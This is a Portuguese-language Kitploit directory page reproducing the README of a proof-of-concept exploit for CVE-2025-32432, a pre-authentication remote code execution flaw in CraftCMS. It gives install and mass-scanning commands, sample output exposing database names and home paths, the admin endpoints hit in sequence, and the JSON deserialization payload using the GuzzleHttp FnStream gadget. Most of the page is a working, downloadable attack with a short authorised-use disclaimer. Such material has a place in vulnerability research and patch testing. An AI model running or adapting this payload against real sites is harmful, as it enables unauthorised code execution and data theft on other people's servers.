Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-32432 — Este repositório contém um script de exploit de prova de conceito para a CVE-2025-32432, uma vulnerabilidade de Execução Remota de Código (RCE) pré-autenticação que afeta o CraftCMS nas versões 4.x e 5.x. A vulnerabilidade existe no recurso de geração de transformação de ativos do CraftCMS. | Kitploit
Ferramentas/GitHubGitHub/sachinart/cve-2025-32432
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubsachinart/cve-2025-32432

CVE-2025-32432

Ver Repositório
2743há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Este repositório contém um script de exploit de prova de conceito para a CVE-2025-32432, uma vulnerabilidade de Execução Remota de Código (RCE) pré-autenticação que afeta o CraftCMS nas versões 4.x e 5.x. A vulnerabilidade existe no recurso de geração de transformação de ativos do CraftCMS.

Compartilhar

Exploit CraftCMS CVE-2025-32432 por Chirag Artani

Visão Geral

Este repositório contém um script de exploit de prova de conceito para CVE-2025-32432, uma vulnerabilidade de Execução Remota de Código (RCE) sem autenticação que afeta CraftCMS versões 4.x e 5.x. A vulnerabilidade existe no recurso de geração de transformação de assets do CraftCMS.

Este script de exploit automatiza a detecção e verificação da vulnerabilidade através de:

  1. Extraindo tokens CSRF do painel de administração do CraftCMS
  2. Explorando a vulnerabilidade através de injeção de objeto PHP
  3. Verificando a exploração bem-sucedida extraindo informações do sistema

Aviso Legal

⚠️ Esta ferramenta é fornecida apenas para fins educacionais e de teste de segurança autorizados.

Use esta ferramenta apenas contra sistemas para os quais você tenha permissão explícita para testar. Testes não autorizados contra sistemas sem permissão são ilegais e antiéticos.

Funcionalidades

  • Suporte para varredura de alvo único e múltiplos alvos (baseado em arquivo)
  • Capacidade de multi-threading para varredura mais rápida de múltiplos alvos
  • Saída detalhada incluindo nome do banco de dados e informações do diretório home
  • Geração de relatório CSV para alvos vulneráveis
  • Bypass de verificação SSL para teste com certificados autoassinados
  • Tratamento robusto de erros

Instalação

root@kitploit:~
# Clone the repository
git clone https://github.com/Sachinart/CVE-2025-32432.git
cd CVE-2025-32432

# Install required dependencies
pip install -r requirements.txt

Requisitos

  • Python 3.6+
  • Pacotes Python necessários (veja requirements.txt):
    • requests
    • beautifulsoup4
    • urllib3

Uso

Alvo Único

Para escanear um único alvo:

root@kitploit:~
python3 craftcms_rce.py -u example.com

Múltiplos Alvos

Para escanear múltiplos alvos a partir de um arquivo (uma URL por linha):

root@kitploit:~
python3 craftcms_rce.py -f urls.txt -t 10

Onde -t especifica o número de threads a usar (padrão é 5).

Opções

root@kitploit:~
-u, --url     URL única para testar
-f, --file    Arquivo contendo URLs para testar (uma por linha)
-t, --threads Número de threads (padrão: 5)
-h, --help    Exibe mensagem de ajuda e sai

Saída

O script exibirá os resultados no console e salvará alvos vulneráveis em vulnerable.txt no formato CSV com as seguintes colunas:

  • URL
  • Valor de CRAFT_DB_DATABASE (nome do banco de dados)
  • Caminho do diretório HOME
  • Outras informações do sistema

Exemplo de saída do console:

root@kitploit:~
[*] Testing single target: https://example.com
[*] Starting scan with 5 threads
[+] VULNERABLE: https://example.com
    CRAFT_DB_DATABASE: example_db
    HOME Directory: /home/example

=== SCAN SUMMARY ===
Total URLs scanned: 1
Vulnerable sites: 1
Detailed results saved to vulnerable.txt

Como a Vulnerabilidade Funciona

Esta vulnerabilidade explora um problema de desserialização no CraftCMS. O exploit:

  1. Faz uma requisição GET para /index.php?p=admin/dashboard para obter um token CSRF
  2. Envia uma requisição POST para /index.php?p=admin/actions/assets/generate-transform com um payload JSON especialmente criado
  3. O payload inclui um objeto PHP que é desserializado, levando à execução arbitrária de código através da classe GuzzleHttp\Psr7\FnStream
  4. A exploração bem-sucedida é verificada executando phpinfo() e extraindo informações específicas do sistema

Detalhes Técnicos

O exploit aproveita uma desserialização insegura no processo de geração de transformação de assets. O caminho de código vulnerável permite que um atacante injete um objeto PHP personalizado que é desserializado, levando à execução arbitrária de código.

Os principais componentes do payload:

root@kitploit:~
{
  "assetId": 11,
  "handle": {
    "width": 123,
    "height": 123,
    "as session": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "GuzzleHttp\\Psr7\\FnStream",
      "__construct()": [[]],
      "_fn_close": "phpinfo"
    }
  }
}

Contribuição

Contribuições, problemas e solicitações de funcionalidades são bem-vindos! Sinta-se à vontade para verificar a página de issues.

Licença

Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para detalhes.

Referências

  • Detalhes do CVE-2025-32432
  • Aviso de Segurança do CraftCMS

Autor

  • Nicolas Bourras (Orange Cyberdefense) - Descoberta original da vulnerabilidade
  • Chirag Artani - Autor do script de exploit
Baixar ferramenta